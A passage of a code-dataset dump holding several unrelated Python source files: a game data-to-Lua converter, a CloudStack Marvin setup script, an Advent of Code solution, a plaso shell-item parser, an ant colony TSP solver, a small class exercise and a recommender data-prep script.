None and cls.langDefault[key] is not None) :\r\n if 'th'.upper() == lang.upper():\r\n return cls.langDefault[key].message_th\r\n else:\r\n return cls.langDefault[key].message_en\r\n return key\r\n \r\n\r\nclass Language(object):\r\n def __init__(self,id_language_label=None,module=None,default_label=None,message_en=None, message_th=None):\r\n self.id_language_label = id_language_label\r\n self.module = module\r\n self.default_label = default_label\r\n self.message_en = message_en\r\n self.message_th = message_th","repo_name":"tongpa/JMProject","sub_path":"PyPollModel/surveyobject/languageobject.py","file_name":"languageobject.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43077900185","text":"#-*-encoding:utf8-*-\n#!/bin/python\n\nimport os\nimport hashlib\nimport yaml\nimport zipfile\nimport time\nimport sys, getopt\n#import oss_util\nfrom jinja2 import *\nimport datetime\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nimport dbutil\nimport shutil\n\ndef tableToClass(fieldName):\n strs = fieldName.split('_')\n result = ''\n for str in strs:\n result = result + str.capitalize()\n return result\n\ndef columnNameToFieldName(columnName):\n strs = columnName.split('_')\n result = ''\n index = 1\n for str in strs:\n if index == 1:\n result = result + str[0].lower() + str[1:]\n else:\n result = result + str.capitalize()\n index = index + 1\n return result\n\nclass Loader( BaseLoader ):\n def __init__(self, parent):\n self.env = Environment( 
loader=FileSystemLoader(parent))\n        self.env.template_class = Template\n        self.env.globals['tableToClass'] = tableToClass\n        self.env.globals['columnNameToFieldName'] = columnNameToFieldName\n\n'''\nConvert sdata data to Lua\n'''\nclass sdatatolua:\n    '''\n    Constructor\n    '''\n    def __init__(self, config):\n        self.game = config['game']\n        self.sdataZipPath = config['sdata_zip_path']\n        self.sdataVersion = config['sdata_version']\n        self.confFilePath = config['config_file_path']\n        self.env = config['env']\n        self.mode = config['mode']\n\n        self.log(\"env:%s\", self.env)\n        self.log(\"game:%s\", self.game)\n        self.log(\"sdataZipPath:%s\", self.sdataZipPath)\n        self.log(\"sdataVersion:%s\", self.sdataVersion)\n\n        self.loadConfig()\n\n        if self.mode == 'db':\n            self.dbutil = dbutil.DBUtil(host=self.dbConf['host'], db=self.dbConf['db'], user=self.dbConf['user'], passwd=self.dbConf['password'])\n\n        # OSS client\n        # self.oss = oss_util.oss_util(access_key_id=self.ossConf['access_key_id'],\n        #                             access_key_secret=self.ossConf['access_key_secret'],\n        #                             bucket_name=self.ossConf['bucket_name'],\n        #                             endpoint=self.ossConf['endpoint'])\n    '''\n    Load the configuration\n    '''\n    def loadConfig(self):\n        filepath = os.path.join(self.confFilePath, \"sdata.yml\")\n        f = open(filepath, 'rb')\n        # self.conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n        self.conf = yaml.load(f.read())\n        f.close()\n\n        sdataBaseDir=self.conf['output_dir']\n        try:\n            sdataBaseDir = sdataBaseDir%self.env\n        except:\n            pass\n\n        self.sdataDir = os.path.join(sdataBaseDir, self.game)\n        self.ossConf = self.conf['oss']\n        self.tablesConf = self.conf['tables']\n        self.dbConf = self.conf['db']\n\n    '''\n    Convert Sdata to Lua\n    '''\n    def doSdataToLua(self):\n        # 1. Check the workspace\n        self.doEnvCheck()\n\n        # 2. Unzip the resources\n        self.unzipSdataZip()\n\n        # 3. Generate the hot update\n        self.genSdataToLua()\n\n        # 4. Clean up\n        self.doClean()\n\n\n    '''\n    Environment check\n    '''\n    def doEnvCheck(self):\n        if not os.path.exists(self.sdataDir):\n            self.log(\"First SdataToLua run, creating directory: %s\", self.sdataDir)\n            os.makedirs(self.sdataDir)\n        self.log(\"sdataDir:%s\", self.sdataDir)\n\n        # Target path\n        self.newVersionDir = os.path.join(self.sdataDir, self.sdataVersion)\n        if not os.path.exists(self.newVersionDir):\n            os.makedirs(self.newVersionDir)\n        self.log(\"sdataVersionDir:%s\", self.newVersionDir)\n\n\n    '''\n    Unzip the resource zip\n    '''\n    def unzipSdataZip(self):\n        if self.mode == 'db':\n            return\n\n        if not os.path.exists(self.sdataZipPath):\n            self.log(\"Resource file not found, path: %s\", self.sdataZipPath)\n            sys.exit(2)\n            return\n\n        # Unzip the files\n        dynamicZipFile = zipfile.ZipFile(self.sdataZipPath, 'r')\n        count = 0\n        start = time.time()\n        totalCount = dynamicZipFile.namelist().__len__()\n        for file in dynamicZipFile.namelist():\n            end = time.time()\n            if end - start > 1:\n                start = time.time()\n                self.log(\"Unzipping resource package: %s/%s\", count, totalCount)\n            count += 1\n            if file.endswith(\".xml\"):\n                self.sdataXmlFile = os.path.join(self.newVersionDir, file)\n\n            dynamicZipFile.extract(file, self.newVersionDir)\n        self.log(\"Unzipping resource package: %s/%s\", count, totalCount)\n\n        dynamicZipFile.close()\n\n        # Check the version number\n        version = self.loadVersionTxt(os.path.join(self.newVersionDir, 'version.txt'))\n\n        if (version != self.sdataVersion):\n            self.log(\"Wrong packaged static data version: %s, input version: %s\", version, self.sdataVersion)\n            sys.exit(2)\n\n        self.log(\"sdataXmlFile:%s\", self.sdataXmlFile)\n\n\n    '''\n    Generate the sdata Lua file\n    '''\n    def genSdataToLua(self):\n        if self.mode == 'db':\n            self.genSdataToLuaByDB()\n        else:\n            self.genSdataToLuaByXML()\n\n    '''\n    Generate the sdata Lua file (db)\n    '''\n    def genSdataToLuaByDB(self):\n        # Read the data\n        self.log(\"genSdataToLua\")\n\n        tablesMap = {}\n        filePath = os.path.join(self.newVersionDir, 
'SdataData.lua')\n f = open(filePath, 'wb')\n results = self.dbutil.query(\"show tables\")\n for tableName in results:\n name = tableName['Tables_in_%s'%self.dbConf['db']]\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n tableResults = self.dbutil.query(\"select * from %s\"%name)\n datas = []\n rowKeys = self.tablesConf[name]['rowKey']\n for row in tableResults:\n dataMap = {}\n for key, value in row.iteritems():\n dataMap[str(key)] = self.getValue(value)\n\n dataMap['rowData'] = ''\n for rowKey in rowKeys.split(\",\"):\n if dataMap['rowData'] != '':\n dataMap['rowData'] = dataMap['rowData'] + \"-\" + dataMap[rowKey]\n else:\n dataMap['rowData'] = dataMap[rowKey]\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader(self.confFilePath).env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n self.log(\"configFilePath:%s\", self.confFilePath)\n template = env.get_template(\"sdatatolua.template\", parent=self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n self.log(\"filePath:%s\", os.path.abspath(filePath))\n\n # 生产zipFile\n fileList = []\n fileList.append('SdataData.lua')\n self.createZipFile(os.path.join(self.sdataDir, contentMD5+\".zip\"), fileList)\n\n '''\n 生产sdataLua文件(XML)\n '''\n def genSdataToLuaByXML(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n domTree = ET.ElementTree(file=self.sdataXmlFile)\n root = domTree.getroot()\n\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n tablesMap = {}\n for child in domTree.iter(tag='table'):\n table = child\n name = table.attrib[\"name\"]\n\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n datas = []\n for row in table:\n dataMap = {}\n for field in row:\n key = field.attrib[\"name\"]\n value = field.text\n dataMap[key] = value\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['rowKey'] = self.tablesConf[name]['rowKey']\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader().env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n template = env.get_template(\"sdatatolua.template\", self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n\n '''\n 执行清理操作\n '''\n def doClean(self):\n try:\n shutil.rmtree(self.newVersionDir)\n except:\n pass\n\n '''\n 载入version.txt\n '''\n def loadVersionTxt(self, filepath):\n # 打开version.lua\n version = None\n resFile = open(filepath, 'rb')\n for line in resFile.readlines():\n if line == None or line.strip() == \"\":\n continue\n line = line.strip()\n 
version = line.strip()\n break\n\n resFile.close()\n\n return version\n\n '''\n 创建zipfile\n '''\n def createZipFile(self, zipFilePath, fileList):\n self.log(\"生成包:%s\", zipFilePath)\n zFile = zipfile.ZipFile(zipFilePath, 'w', compression=zipfile.ZIP_DEFLATED)\n\n for filename in fileList:\n filepath = os.path.join(self.newVersionDir, filename)\n zFile.write(filepath, filename)\n # self.log(\"pack zip file:%s, file:%s\", zipFilePath, filename)\n\n zFile.close()\n\n '''\n 拷贝文件\n '''\n def copyFile(self, filepath, filename):\n topath = os.path.join(self.out_dir, filename)\n self.execCmd(\"cp %s %s\", filepath, topath)\n\n '''\n 计算字符串md5\n '''\n def md5(self, content):\n m = hashlib.md5()\n m.update(content)\n\n return m.hexdigest()\n\n '''\n 计算文件md5\n '''\n def md5file(self, filepath):\n m = hashlib.md5()\n md5file = open(filepath, 'rb')\n m.update(md5file.read())\n md5file.close()\n\n return m.hexdigest()\n\n '''\n 执行系统命令\n '''\n def execCmd(self, cmd, *args):\n print(args)\n if args != None and len(args) > 0:\n cmd = cmd%args\n\n p = os.popen(cmd)\n self.log(\"exec cmd: %s end. rtn:%s\", cmd, p.read())\n\n '''\n 打印日志\n '''\n def log(self, fmt, *args):\n if args == None and len(args) == 0:\n return\n\n print(fmt%args)\n\n '''\n 获取值\n '''\n def doSQL(self, sql):\n return sql.replace('%s', '\\'' + '%s' + '\\'')\n \n '''\n 获取db值\n '''\n def getValue(self, value):\n valueTypeName = type(value).__name__\n rtn = None\n if valueTypeName != 'str' and valueTypeName != 'unicode':\n rtn = str(value)\n else:\n rtn = value\n\n if rtn.find('\"') != -1:\n rtn = rtn.replace('\"', '\\\\\"')\n return rtn\n\ndef main(argv):\n config = {\n \"game\": \"zjzr2\",\n \"sdata_zip_path\": \"C:\\\\Users\\\\wangys\\\\Downloads\\\\sdata.zip\",\n \"sdata_version\": \"0.0.0.0\",\n \"env\": \"dev\",\n \"mode\": \"db\",\n \"config_file_path\": \"tools\"\n }\n try:\n opts, args = getopt.getopt(argv, \"g:p:v:r:s:e:t:h:\", [\"game=\", \"path=\", \"version=\", \"region\", \"scope=\", \"env=\", \"tips=\", \"help=\"])\n except getopt.GetoptError:\n print('hotupdate -g -p -v -r -s -e [-t ]')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-g\", \"--game\"):\n config['game'] = arg\n elif opt in (\"-p\", \"--path\"):\n config['res_zip_path'] = arg\n elif opt in (\"-v\", \"--version\"):\n config['game_version'] = arg\n elif opt in (\"-r\", \"--region\"):\n config['region'] = arg\n elif opt in (\"-s\", \"--scope\"):\n config['scope'] = arg\n elif opt in (\"-e\", \"--env\"):\n config['env'] = arg\n elif opt in (\"-t\", \"--tips\"):\n config['update_tips'] = arg\n elif opt in (\"-h\", \"--help\"):\n print('hotupdate -g -p -v -r -s -e [-t ]')\n # /home/hario/hotupdate.sh --game ${option.game} --region ${option.region} --scope ${option.scope} --version ${option.version} --env ${option.env} --isBeta ${option.isBeta} --hides ${option.hides}\n # -g gmmx -p F:/hotupdate/gmmx_cn_9.9.9.9_android_20190527180239_191_static_dynamic.zip -v 9.9.9.9 -r cn_luajit32 -u android,ast -t tips\n\n p = sdatatolua(config)\n p.doSdataToLua()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"qq4215279/study_python","sub_path":"py_study_2.7_test/sbtj_tools/sdatatolua.py","file_name":"sdatatolua.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33780711425","text":"try:\n from setuptools import setup, find_packages\nexcept ImportError:\n try:\n from distribute_setup import use_setuptools\n use_setuptools()\n from setuptools import 
setup, find_packages\n except ImportError:\n raise RuntimeError(\"python setuptools is required to build Marvin\")\n\n\nVERSION = \"4.19.0.0\"\n\nsetup(name=\"Marvin\",\n version=VERSION,\n description=\"Marvin - Python client for Apache CloudStack\",\n author=\"The Apache CloudStack Team\",\n author_email=\"dev@cloudstack.apache.org\",\n maintainer=\"The Apache CloudStack Team\",\n maintainer_email=\"dev@cloudstack.apache.org\",\n long_description=\"Marvin is the Apache CloudStack python \"\n \"client written around the unittest framework\",\n platforms=(\"Any\",),\n url=\"https://builds.apache.org/job/cloudstack-marvin/\",\n packages=[\"marvin\", \"marvin.cloudstackAPI\",\n \"marvin.lib\", \"marvin.config\", \"marvin.sandbox\",\n \"marvin.sandbox.advanced\", \"marvin.sandbox.advancedsg\",\n \"marvin.sandbox.basic\"],\n license=\"LICENSE.txt\",\n install_requires=[\n \"mysql-connector-python <= 8.0.30\",\n \"requests >= 2.2.1\",\n \"paramiko >= 1.13.0\",\n \"nose >= 1.3.3\",\n \"ddt >= 0.4.0\",\n \"pyvmomi >= 5.5.0\",\n \"netaddr >= 0.7.14\",\n \"dnspython\",\n \"ipmisim >= 0.7\",\n \"pytz\",\n \"retries\",\n \"PyCrypt\",\n \"kubernetes\",\n \"urllib3\",\n \"setuptools >= 40.3.0\"\n ],\n py_modules=['marvin.marvinPlugin'],\n zip_safe=False,\n entry_points={\n 'nose.plugins': ['marvinPlugin = marvin.marvinPlugin:MarvinPlugin'],\n 'console_scripts': ['marvincli = marvin.deployAndRun:main']\n },\n )\n","repo_name":"apache/cloudstack","sub_path":"tools/marvin/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":1557,"dataset":"github-code","pt":"32"} +{"seq_id":"19202127125","text":"file = open('puzzle/07.in', 'r')\ncontent = file.read().splitlines()\n\n# part 1\nmatryoshka = {'shiny gold'}\nbf_length = 0\nwhile bf_length != len(matryoshka):\n bf_length = len(matryoshka)\n for expression in content:\n contained_colors = set()\n for sentence in expression.split('contain')[1].split(','):\n contained_colors.add(sentence[3:sentence.index('bag') - 1])\n if set.intersection(matryoshka, contained_colors) != set():\n matryoshka.add(expression.split('contain')[0][:-6])\nmatryoshka.remove('shiny gold')\nprint(len(matryoshka))\n\n# part 2\nparents = {}\nfor expression in content:\n if expression.split('bags')[0][:-1] not in matryoshka:\n if expression.split('contain ')[1] == 'no other bags.':\n parents[expression.split('bags')[0][:-1]] = 0\n else:\n inside = expression.split('contain')[1].split(',')\n value = []\n for bag in inside:\n value.extend([bag[1], bag[3:bag.index('bag')-1]])\n parents[expression.split('bags')[0][:-1]] = value\nint_parents = {}\nfor bag in parents:\n if isinstance(parents[bag], int):\n int_parents[bag] = parents[bag]\n\nwhile int_parents != parents:\n for color in parents:\n if color not in int_parents:\n for bag in range(1, len(parents[color]), 2):\n if parents[color][bag] not in int_parents:\n break\n else:\n value = 0\n for bag in range(0, len(parents[color]), 2):\n value += int(parents[color][bag])*(1 + parents[parents[color][bag+1]])\n parents[color] = int_parents[color] = value\nprint(parents['shiny gold'])\n","repo_name":"michalwasik/Advent-of-Code","sub_path":"2020/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17029632021","text":"import pyfwsi\n\nfrom plaso.events import shell_item_events\nfrom plaso.lib import eventdata\nfrom plaso.winnt import 
shell_folder_ids\n\n\nif pyfwsi.get_version() < '20140714':\n raise ImportWarning(\n u'Shell item support fuctions require at least pyfwsi 20140714.')\n\n\nclass ShellItemsParser(object):\n \"\"\"Parses for Windows NT shell items.\"\"\"\n\n NAME = 'shell_items'\n\n def __init__(self, origin):\n \"\"\"Initializes the parser.\n\n Args:\n origin: A string containing the origin of the event (event source).\n \"\"\"\n super(ShellItemsParser, self).__init__()\n self._origin = origin\n self._path_segments = []\n\n def _ParseShellItem(self, parser_context, shell_item):\n \"\"\"Parses a shell item.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n shell_item: the shell item (instance of pyfwsi.item).\n \"\"\"\n path_segment = None\n\n if isinstance(shell_item, pyfwsi.root_folder):\n description = shell_folder_ids.DESCRIPTIONS.get(\n shell_item.shell_folder_identifier, None)\n\n if description:\n path_segment = description\n else:\n path_segment = u'{{{0:s}}}'.format(shell_item.shell_folder_identifier)\n\n elif isinstance(shell_item, pyfwsi.volume):\n if shell_item.name:\n path_segment = shell_item.name\n elif shell_item.identifier:\n path_segment = u'{{{0:s}}}'.format(shell_item.identifier)\n\n elif isinstance(shell_item, pyfwsi.file_entry):\n long_name = u''\n localized_name = u''\n file_reference = u''\n for exension_block in shell_item.extension_blocks:\n if isinstance(exension_block, pyfwsi.file_entry_extension):\n long_name = exension_block.long_name\n localized_name = exension_block.localized_name\n file_reference = exension_block.file_reference\n if file_reference:\n file_reference = u'{0:d}-{1:d}'.format(\n file_reference & 0xffffffffffff, file_reference >> 48)\n\n fat_date_time = exension_block.get_creation_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.CREATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = exension_block.get_access_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.ACCESS_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n fat_date_time = shell_item.get_modification_time_as_integer()\n if fat_date_time:\n event_object = shell_item_events.ShellItemFileEntryEvent(\n fat_date_time, eventdata.EventTimestamp.MODIFICATION_TIME,\n shell_item.name, long_name, localized_name, file_reference,\n self._origin)\n parser_context.ProduceEvent(event_object, parser_name=self.NAME)\n\n if long_name:\n path_segment = long_name\n elif shell_item.name:\n path_segment = shell_item.name\n\n elif isinstance(shell_item, pyfwsi.network_location):\n if shell_item.location:\n path_segment = shell_item.location\n\n if path_segment is None and shell_item.class_type == 0x00:\n # TODO: check for signature 0x23febbee\n pass\n\n if path_segment is None:\n path_segment = u'UNKNOWN: 0x{0:02x}'.format(shell_item.class_type)\n\n self._path_segments.append(path_segment)\n\n def CopyToPath(self):\n \"\"\"Copies the shell items to a path.\n\n Returns:\n A Unicode string containing the converted shell item list path or None.\n \"\"\"\n if not self._path_segments:\n return\n\n return u', '.join(self._path_segments)\n\n def Parse(self, parser_context, byte_stream, 
codepage='cp1252'):\n \"\"\"Parses the shell items from the byte stream.\n\n Args:\n parser_context: A parser context object (instance of ParserContext).\n byte_stream: a string holding the shell items data.\n codepage: Optional byte stream codepage. The default is cp1252.\n \"\"\"\n self._path_segments = []\n shell_item_list = pyfwsi.item_list()\n shell_item_list.copy_from_byte_stream(byte_stream, ascii_codepage=codepage)\n\n for shell_item in shell_item_list.items:\n self._ParseShellItem(parser_context, shell_item)\n","repo_name":"cvandeplas/plaso","sub_path":"plaso/parsers/shared/shell_items.py","file_name":"shell_items.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"17904132363","text":"\"\"\"\nCode Reference : https://github.com/Akavall/AntColonyOptimization\n\"\"\"\nimport random as rn\nimport numpy as np\nfrom numpy.random import choice as np_choice\nimport random\nimport pandas as pd\nimport operator\nimport time\n\nclass AntColony:\n def __init__(self, distances, n_ants, n_best, n_iterations, decay, alpha=1, beta=1):\n \"\"\"\n Args:\n distances (2D numpy.array): Square matrix of distances. Diagonal is assumed to be np.inf.\n n_ants (int): Number of ants running per iteration\n n_best (int): Number of best ants who deposit pheromone\n n_iteration (int): Number of iterations\n decay (float): Rate it which pheromone decays. The pheromone value is multiplied by decay, so 0.95 will lead to decay, 0.5 to much faster decay.\n alpha (int or float): exponenet on pheromone, higher alpha gives pheromone more weight. Default=1\n beta (int or float): exponent on distance, higher beta give distance more weight. Default=1\n\n Example:\n ant_colony = AntColony(german_distances, 100, 20, 2000, 0.95, alpha=1, beta=2) \n \"\"\"\n self.distances = distances\n self.pheromone = np.ones(self.distances.shape) / len(distances)\n self.all_inds = range(len(distances))\n self.n_ants = n_ants\n self.n_best = n_best\n self.n_iterations = n_iterations\n self.decay = decay\n self.alpha = alpha\n self.beta = beta\n\n \n def run(self):\n shortest_path = None\n all_time_shortest_path = (\"placeholder\", np.inf)\n for i in range(self.n_iterations):\n all_paths = self.gen_all_paths()\n self.spread_pheronome(all_paths, self.n_best, shortest_path=shortest_path)\n shortest_path = min(all_paths, key=lambda x: x[1])\n #print(\"Length of the Shortest path during \"+str(i)+\" iteration is \"+str(shortest_path[1]))\n if shortest_path[1] < all_time_shortest_path[1]:\n all_time_shortest_path = shortest_path \n self.pheromone * self.decay \n return all_time_shortest_path\n\n def spread_pheronome(self, all_paths, n_best, shortest_path):\n sorted_paths = sorted(all_paths, key=lambda x: x[1])\n for path, dist in sorted_paths[:n_best]:\n for move in path:\n self.pheromone[move] += 1.0 / self.distances[move]\n\n def gen_path_dist(self, path):\n total_dist = 0\n for ele in path:\n total_dist += self.distances[ele]\n return total_dist\n\n def gen_all_paths(self):\n all_paths = []\n for i in range(self.n_ants):\n path = self.gen_path(0)\n all_paths.append((path, self.gen_path_dist(path)))\n return all_paths\n\n def gen_path(self, start):\n path = []\n visited = set()\n visited.add(start)\n prev = start\n for i in range(len(self.distances) - 1):\n move = self.pick_move(self.pheromone[prev], self.distances[prev], visited)\n path.append((prev, move))\n prev = move\n visited.add(move)\n path.append((prev, start)) # going back to 
where we started \n return path\n\n def pick_move(self, pheromone, dist, visited):\n pheromone = np.copy(pheromone)\n pheromone[list(visited)] = 0\n\n row = pheromone ** self.alpha * (( 1.0 / dist) ** self.beta)\n\n norm_row = row / row.sum()\n move = np_choice(self.all_inds, 1, p=norm_row)[0]\n return move\n\n\ndef read_data(data_file):\n df = pd.read_csv(data_file) \n nodes = []\n for i in range(len(df['pairs'])):\n sp = df['pairs'][i].split(' ')\n x = float(sp[1])\n y = float(sp[2])\n nodes.append([x, y])\n return nodes\n\n \ndef eucledian_distance(a, b):\n ret = 0\n for i in range(len(a)):\n ret += (a[i] - b[i]) ** 2\n return ret ** 0.5\n\n\ndef main(data_file):\n start = time.time()\n\n beta = 2\n q0 = 0.95\n alpha = 0.1\n peta = 0.1\n n_ants = 20 #No of Ants\n m_ants = 5\n iterations = 100\n\n nodes = read_data(data_file)\n\n arrs = [[np.inf]*len(nodes)]*len(nodes)\n\n for i in range(len(nodes)):\n for j in range(i+1, len(nodes)):\n arrs[i][j] = eucledian_distance(nodes[i], nodes[j])\n arrs[j][i] = arrs[i][j]\n\n distances = np.array(arrs)\n\n ant_colony = AntColony(distances, n_ants, m_ants, iterations, q0, alpha, beta)\n\n shortest_path = ant_colony.run()\n print('Shortest Path Length', str(shortest_path[1]))\n\n time_lapse = time.time() - start\n print('Time lapsed', time_lapse)\n\nif __name__=='__main__':\n main(data_file)","repo_name":"Shraddha2702/Summer_AI","sub_path":"TravelingSalesman/Algorithms/.ipynb_checkpoints/AntColonyAlgo-checkpoint.py","file_name":"AntColonyAlgo-checkpoint.py","file_ext":"py","file_size_in_byte":4681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"3985351358","text":"class Person:\n def __init__(self, name):\n self.name = name\n\n def __str__(self):\n return self.name\n\n def push_name(self, person):\n person.name = self.name\n\n def attack(self, person):\n name = str(person)\n for _ in str(name):\n if _ in self.name.lower() + self.name.upper():\n name = name.replace(_, '')\n person.name = name\n\n def show_name(self):\n print(f\"Hello, I am {self.name}\")\n\n\nclass Destroyer:\n def __init__(self, chars, replace_chars='#'):\n self.chars = chars\n self.replace_chars = replace_chars\n\n def __call__(self, person):\n name = str(person)\n repl_list = []\n for _ in str(name):\n if _ in self.chars.lower() + self.chars.upper():\n name = name.replace(_, self.replace_chars)\n repl_list.append(f\"'{_.lower()}'\")\n repl_list = list(set(repl_list))\n repl_list.sort()\n print(f\"Destroyed: {', '.join(set(repl_list))} from {name}'s name.\")\n person.name = name\n return person\n\n\nif __name__ == '__main__':\n john = Person(\"John\")\n alberta = Person(\"Alberta\")\n print(john, alberta)\n v_kill = Destroyer(\"aeiou\")\n v_kill(john)\n print(john, alberta)\n alpha_kill = Destroyer(\"\".join(chr(i) for i in range(65, 91)), \"\")\n print(john, alberta)\n alpha_kill(john)\n print(john, alberta)\n alberta.push_name(john)\n print(john, alberta)\n caitlin = Person(\"Caitlin\")\n john.attack(caitlin)\n print(caitlin)\n v_kill(caitlin).show_name()\n alberta.show_name()\n","repo_name":"berson969/InterviewTests","sub_path":"bykov_decision.py","file_name":"bykov_decision.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38520362131","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 8 11:34:08 2019\n\n@author: gzs13133\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport lightgbm as 
lgb\nimport matplotlib.pylab as plt\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\nimport os \nos.chdir('C://Users//GZS13133//intern//data//data_with_hist')\nimport keras.backend as K\nfrom base_structure import draw\nfrom model import ccBaseModel, ccDINModelwithOneHist, ccdeepFM\nfrom data_process import judge_multi_feature, multi_column_info, one_column_inde_info, train_test_split, \\\n    sample_weight_generate, nlp_weight_dict, nlp_wor2vec_dict, gametype_word2evc_list, \\\n    train_test_split_all, column_count_bar, data_build\n\n\n'''Data schema\nsn, gametype, label, \nandroid_app: 1001 types, 250 length, sn\nios_app: 1001 types, 8 length, sn\nmobile_model: 1001 types, 20 length, sn \ninterest_gametype: 24 types, 9 length, sn\ngametype_label: 1000 types, 20 length, game\ngametype_hotrank_by_aid_cnt: 51 types, 1 length, game \ngametype_hotrank_by_uid_cnt: 51 types, 1 length, game\ngametype_id: 127 types, 1 length, same as gametype\n'''\n\n'''Two modeling ideas\n1. Treat each variable-length sequence as a multi-hot encoded feature fed into the DIN model\n2. Treat each variable-length sequence as several hist sequences combined by attention sums (not feasible, since the feature spaces differ; a transformer structure could be introduced)\n(understood as different kinds of historical behavior influencing the recommendation for a user differently)\nEssentially the difference between the two is whether attention is used\n'''\n\n\n############ Data loading\ncolumns = 'sn, gametype, label, android_app, ios_app, mobile_model, \\\ninterest_gametype, gametype_label, gametype_hotrank_by_aid_cnt, \\\ngametype_hotrank_by_uid_cnt, gametype_id'\n\n#data_route = 'temp'\n#data_route = 'temp_05_09'\ndata_route = 'temp_05_22_train'\ndata_all = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all.columns = columns.split(', ')\n\n#gametype & gametype_id are identical\n#a, b = list(data['gametype'].values),list(data['gametype_id'].values)\n#sum([1*(a[i]==b[i]) for i in range(len(a))])\ndata_all = data_all.iloc[:,:-1]\n \ndata_all = data_all.fillna('-1')\n\ndata_route = 'temp_05_22_test'\ndata_all_1 = pd.read_csv(data_route, header=None, sep='\\t', low_memory=False)\ndata_all_1.columns = columns.split(', ')\ndata_all_1 = data_all_1.iloc[:,:-1]\ndata_all_1 = data_all_1.fillna('-1')\n\ndata_alll = pd.concat([data_all, data_all_1])\ndata, data_in = train_test_split_all(data_alll, test_num=150000)\ndel data_alll, data_all, data_all_1\n#data_all_with_hist = data_all[data_all['interest_gametype'] != '-1']\n#data_all_without_hist = data_all[data_all['interest_gametype'] == '-1']\n\n#data_all = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_train_all.csv', low_memory=False)\n#data_in = pd.read_csv('C:/Users/GZS13133/intern/data/csv_data/data_test_all.csv', low_memory=False)\n\ndata_all = pd.read_csv('temp_hist_0610', low_memory=False)\n\ndata_all.columns = columns.split(', ')\ndata_all = data_all.iloc[:,:-1] \ndata_all = data_all.fillna('-1')\ndata_all = data_all[data_all['gametype'] != -1]\ndata_all_hist = data_all[data_all['interest_gametype'] != '-1']\ndata_all_hist.to_csv('temp_hist_0610', header=True, index=False)\n#train_num = 5000000\n#data_all = data_build(data_all, train_num, app_minus_inclued=False, sep='::')\ncolumn_count_bar(data_all_hist, 'gametype', 'All')\n\ndata = pd.read_csv('temp_train_0610_100w', low_memory=False)\ndata_in = pd.read_csv('temp_test_0610_1w', low_memory=False)\ndata_all = pd.concat([data, data_in])\n\ndata_temp = data_build(data_all, 800000)\ndata, data_in = train_test_split_all(data_temp, test_num=150000)\n#data.to_csv('temp_train_0627_400w', header=True, index=False)\n#data_in.to_csv('temp_test_0627_15w', header=True, index=False)\ndel data_all, data_temp\n\n\n#The 